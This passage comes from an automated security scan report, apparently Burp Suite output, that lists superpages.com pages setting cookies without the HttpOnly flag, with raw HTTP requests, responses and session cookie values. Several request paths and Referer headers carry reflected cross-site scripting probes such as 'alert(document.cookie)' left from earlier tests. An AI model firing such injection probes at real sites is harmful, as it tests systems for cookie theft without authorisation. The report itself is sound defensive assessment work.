<div class="f11" ><a href="http://yellowpages.superpages.com/blog?EG=2&amp;listingid=2118363360&amp;origText=&amp;badword=&amp;type=add&amp;bizurl=/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?dls=true&amp;bizname=Ally+Bank+-+Money+Market+Funds&amp;LID=La7vjc/xbLslZMK7ylYCgQ==&amp;sessionid=1296748823650-www.superpages.com-30323935-794472" onClick="clickTrackUGC3('blogAdd', 'yp_profile');return true;">Add a Blog</a>
...[SNIP]...

3. Cookie without HttpOnly flag set  previous  next
There are 20 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



3.1. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.superpages.com
Path:   /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: SPC=1296748823650-www.superpages.com-30323935-794472; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:00:23 GMT; Path=/
Set-Cookie: JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:00:23 GMT
Content-Length: 65780

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Ally Bank in Philad
...[SNIP]...

3.2. http://www.superpages.com/bp/xmlproxyf53dc%22-alert(document.cookie)-%22b9a871a93d9  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.superpages.com
Path:   /bp/xmlproxyf53dc%22-alert(document.cookie)-%22b9a871a93d9

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bp/xmlproxyf53dc%22-alert(document.cookie)-%22b9a871a93d9?url=http%3A%2F%2Fugc-int.superpages.com%2Fugcwiki%2FGetPhotoServlet%3FlistingId%3D2118363360 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/xmlproxyf53dc%22-alert(document.cookie)-%22b9a871a93d9?url=http%3A%2F%2Fugc-int.superpages.com%2Fugcwiki%2FGetPhotoServlet%3FlistingId%3D2118363360
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OpenPhones=; SPC=1296748823650-www.superpages.com-30323935-794472; s_lastvisit=1296748870245; s_pv=Business%20Profile; s_dfa=superpagescom; s_vi=[CS]v1|26A56898051D3E94-40000129001DB9DD[CE]; web=; shopping=; yp=; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: JSESSIONID=7E88C67F7FFF85DD8CFB8379B82BF1F4; Path=/
Set-Cookie: web=; Domain=.superpages.com; Path=/
Set-Cookie: shopping=; Domain=.superpages.com; Path=/
Set-Cookie: yp=; Domain=.superpages.com; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:11:19 GMT
Content-Length: 57654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="JavaScript" type="text/javascript">
document.cookie="OpenPhones=";
</script>
<h
...[SNIP]...

3.3. http://www.superpages.com/coupons  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.superpages.com
Path:   /coupons

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /coupons HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: JSESSIONID=935846B8705224F72C259EA0DCC18B40; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 74624
Date: Thu, 03 Feb 2011 17:06:50 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="h
...[SNIP]...

3.4. http://www.superpages.com/mobile/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.superpages.com
Path:   /mobile/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mobile/ HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.1 302 Moved Temporarily
Server: Unspecified
Set-Cookie: JSESSIONID=61349948AB01600308944E0F8F10BD6E; Path=/prod
Location: http://www.superpages.com/mobile/index
Content-Type: text/html
Content-Length: 0
Date: Thu, 03 Feb 2011 17:06:10 GMT
Connection: close
Set-Cookie: NSC_xxx-tqnpcjmf-dpn-80=ffffffff9482137a45525d5f4f58455e445a4a421570;expires=Thu, 03-Feb-2011 17:08:11 GMT;path=/


3.5. http://www.superpages.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 17:06:27 GMT
Server: Unspecified
Vary: Host
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:21:27 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...

3.6. http://www.superpages.com/about/copyright.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /about/copyright.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about/copyright.html HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 17:06:04 GMT
Server: Unspecified
Vary: Host
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:21:04 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-e
...[SNIP]...

3.7. http://www.superpages.com/about/privacy.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /about/privacy.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about/privacy.html HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 17:06:05 GMT
Server: Unspecified
Vary: Host
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:21:05 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

3.8. http://www.superpages.com/bp/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bp/ HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 17:05:55 GMT
Server: Unspecified
Vary: Host
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:20:55 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

3.9. http://www.superpages.com/bp/US/javascript:%20return%20validate()  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/US/javascript:%20return%20validate()

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bp/US/javascript:%20return%20validate() HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 17:05:37 GMT
Server: Unspecified
Vary: Host
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:20:37 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>SuperPages.com: Not Found - Please Try Again</title>
<meta http-equiv="Cont
...[SNIP]...

3.10. http://www.superpages.com/bp/US/javascript:finishFBReg('http:/www.superpages.com/bp/FinishFBReg')  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/US/javascript:finishFBReg('http:/www.superpages.com/bp/FinishFBReg')

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bp/US/javascript:finishFBReg('http:/www.superpages.com/bp/FinishFBReg') HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 17:05:49 GMT
Server: Unspecified
Vary: Host
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:20:49 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>SuperPages.com: Not Found - Please Try Again</title>
<meta http-equiv="Cont
...[SNIP]...

3.11. http://www.superpages.com/cities  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /cities

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cities HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.0 301 Moved Permanently
Date: Thu, 03 Feb 2011 17:06:30 GMT
Server: Unspecified
Location: http://www.superpages.com/cities/
Content-Length: 241
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:21:30 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.superpages.c
...[SNIP]...

3.12. http://www.superpages.com/cities/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /cities/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cities/ HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 17:06:31 GMT
Server: Unspecified
Vary: Host
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:21:31 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Superpages.com: City
...[SNIP]...

3.13. http://www.superpages.com/css/fall.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /css/fall.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/fall.css HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/xmlproxyf53dc%22-alert(document.cookie)-%22b9a871a93d9?url=http%3A%2F%2Fugc-int.superpages.com%2Fugcwiki%2FGetPhotoServlet%3FlistingId%3D2118363360
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_lastvisit=1296748870245; s_pv=Business%20Profile; s_dfa=superpagescom; s_vi=[CS]v1|26A56898051D3E94-40000129001DB9DD[CE]; web=; shopping=; yp=

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:11:16 GMT
Server: Unspecified
Vary: Host
Last-Modified: Tue, 01 Feb 2011 17:44:37 GMT
ETag: "932a3-d2f-160aeb40"
Accept-Ranges: bytes
ntCoent-Length: 3375
Content-Type: text/css
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:26:16 GMT;path=/
Cache-Control: private
Content-Length: 3375

body, #generic body {background: url("http://img.superpages.com/images-yp/sp/images/fw/masthead-generic-bg.png") no-repeat scroll 50% 0 transparent;}
.masthead .superguarantee-learn {left: 625px; top
...[SNIP]...

3.14. http://www.superpages.com/inc/s_code.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /inc/s_code.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /inc/s_code.js HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Referer: http://mapserver.superpages.com/mapbasedsearch/?&SRC=comlocal1ae0186%22%3balert(1)//4a2e6a0ce5b&C=banks&L=19101&CS=L&MCBP=true&C=Banks&STYPE=S&PS=15&search=Find+It
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472; s_lastvisit=1296748870245; s_vi=[CS]v1|26A56898051D3E94-40000129001DB9DD[CE]; __unam=c5114f2-12dec4b1cc4-7f15d273-1; s_cc=true; s_pv=Error%20Page%20Try%20Again; s_dfa=superpagescom; s_sq=%5B%5BB%5D%5D; JSESSIONID=7E88C67F7FFF85DD8CFB8379B82BF1F4; web=; shopping=; yp=; s_ppv=100

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:37:30 GMT
Server: Unspecified
Vary: Host
Last-Modified: Thu, 16 Dec 2010 23:00:27 GMT
ETag: "44bd9-9e56-50258c0"
Accept-Ranges: bytes
ntCoent-Length: 40534
Content-Type: application/javascript
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:52:30 GMT;path=/
Cache-Control: private
Content-Length: 40534

/* SiteCatalyst code version: H.22.1.
Copyright 1997-2007 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************

...[SNIP]...

3.15. http://www.superpages.com/inc/social/sln.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /inc/social/sln.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /inc/social/sln.php HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.0 302 Found
Date: Thu, 03 Feb 2011 17:05:59 GMT
Server: Unspecified
Vary: Host
Location:
Content-Length: 0
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:20:59 GMT;path=/


3.16. http://www.superpages.com/inc/social/soc.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /inc/social/soc.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /inc/social/soc.css HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Referer: http://mapserver.superpages.com/mapbasedsearch/?&SRC=comlocal1ae0186%22%3balert(1)//4a2e6a0ce5b&C=banks&L=19101&CS=L&MCBP=true&C=Banks&STYPE=S&PS=15&search=Find+It
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472; s_lastvisit=1296748870245; s_vi=[CS]v1|26A56898051D3E94-40000129001DB9DD[CE]; __unam=c5114f2-12dec4b1cc4-7f15d273-1; s_cc=true; s_pv=Error%20Page%20Try%20Again; s_dfa=superpagescom; s_sq=%5B%5BB%5D%5D; JSESSIONID=7E88C67F7FFF85DD8CFB8379B82BF1F4; web=; shopping=; yp=; s_ppv=100

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:37:30 GMT
Server: Unspecified
Vary: Host
Last-Modified: Fri, 23 Oct 2009 19:52:55 GMT
ETag: "4cfc7-6a1-8ed453c0"
Accept-Ranges: bytes
ntCoent-Length: 1697
Content-Type: text/css
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff9482136245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:52:30 GMT;path=/
Cache-Control: private
Content-Length: 1697

/* CSS Document */
#sp_soclink_box {
   width:260px;
   background-color:#e5e5e5;
   border:1px solid #666666;
   position:absolute;
   padding:0px;
   padding-left:4px;
   padding-bottom:4px;
   margin:0;
   z-index:9
...[SNIP]...

3.17. http://www.superpages.com/inc/social/soc.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /inc/social/soc.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.supermedia.com/business-listings/business-profile?&tsrc=SP198c8%22%3balert(document.cookie)//96cb9badcf2&campaignId=BP:Update+Your+Profile+Top
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472; s_vi=[CS]v1|26A56898051D3E94-40000129001DB9DD[CE]; JSESSIONID=7E88C67F7FFF85DD8CFB8379B82BF1F4; web=; shopping=; yp=; s_lastvisit=1296754109045; s_cc=true; s.campaign=comlocal1a; s_sq=%5B%5BB%5D%5D; s_ppv=100; __unam=c5114f2-12dec4b1cc4-7f15d273-3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:57:55 GMT
Server: Unspecified
Vary: Host
Content-Type: application/javascript
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:12:55 GMT;path=/
Content-Length: 15125

var IE = document.all?true:false
if (!IE) document.captureEvents(Event.MOUSEMOVE)
document.onmousemove = getMouseXY;
var tempX = 0
var tempY = 0
function getMouseXY(e) {
if (IE) { // grab the x-y po
...[SNIP]...

3.18. http://www.superpages.com/js/promo.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /js/promo.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/promo.js HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
